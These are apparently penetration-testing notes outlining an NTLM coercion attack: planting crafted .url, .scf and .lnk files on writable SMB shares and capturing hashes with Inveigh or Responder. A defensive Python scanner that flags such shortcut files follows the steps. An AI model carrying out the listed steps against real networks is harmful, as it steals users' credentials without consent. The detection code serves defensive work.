Forced Coercion Attack
Files to trigger the attack:
1) .url File: A shortcut file that contains a URL pointing to a remote server.
2) .scf File: A Shell Command File configured to initiate a connection to a remote server.
3) .lnk File: A Windows shortcut file crafted to point to a remote server.
Tools:
Inveigh https://github.com/Kevin-Robertson/Inveigh
Responder
Invoke-ShareHunter https://github.com/Leo4j/Invoke-ShareHunter (Optional)
Permissions: Local Administrator (Inveigh), Write permissions over an SMB share
Steps
1) Load Inveigh and configure listener
2) Load Inveigh and set listener IP (Attack System)
3) Load Invoke-ShareHunter
4) Identify writeable shares within the domain
5) Write NTLM coercion files to identified writeable shares
6) Wait for a user to browse to a share containing the crafted files; an NTLM hash is then captured on the listener
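From the defender's side, files planted in step 5 can be found by sweeping shares for .url, .scf and .lnk files that reference a host outside the set of known file servers. The sketch below is an added example, not part of the original notes or of any tool listed above; the names unc_hosts and scan_share, the allow-list idea and the sample bytes are assumptions made for illustration.

```python
import re
from pathlib import Path

# File types the page lists as coercion triggers.
SUSPECT_EXT = {".url", ".scf", ".lnk"}
# Remote host references: \\host\ or file://host/ in 8-bit text (.url, .scf) ...
REMOTE_8BIT = re.compile(rb"(?:\\\\|file://)([A-Za-z0-9._-]{1,253})[\\/]", re.I)
# ... and \\host\ stored as UTF-16LE, as strings inside .lnk files can be.
REMOTE_UTF16 = re.compile(rb"\\\x00\\\x00((?:[A-Za-z0-9._-]\x00){1,253})\\\x00")


def unc_hosts(data: bytes) -> set:
    """Return the lower-cased remote hosts referenced anywhere in data."""
    hosts = {m.group(1).decode("ascii").lower() for m in REMOTE_8BIT.finditer(data)}
    hosts |= {m.group(1).decode("utf-16-le").lower() for m in REMOTE_UTF16.finditer(data)}
    return hosts


def scan_share(root, allowed_hosts):
    """List (path, hosts) for shortcut files pointing at hosts not in allowed_hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.suffix.lower() not in SUSPECT_EXT or not path.is_file():
            continue
        try:
            with path.open("rb") as fh:
                data = fh.read(1 << 20)  # shortcut files are small; cap the read
        except OSError:
            continue  # unreadable file: skip it, do not abort the sweep
        unexpected = unc_hosts(data) - allowed
        if unexpected:
            findings.append((str(path), sorted(unexpected)))
    return findings


if __name__ == "__main__":
    # Constructed sample bytes (documentation-range IP), not a real shortcut file.
    sample = b"ref=\\\\198.51.100.7\\s\\i.ico"
    print(sorted(unc_hosts(sample)))
```

Each finding is a lead to review: a shortcut on a shared folder that points at a host nobody recognises as a file server deserves a look at who wrote it and when.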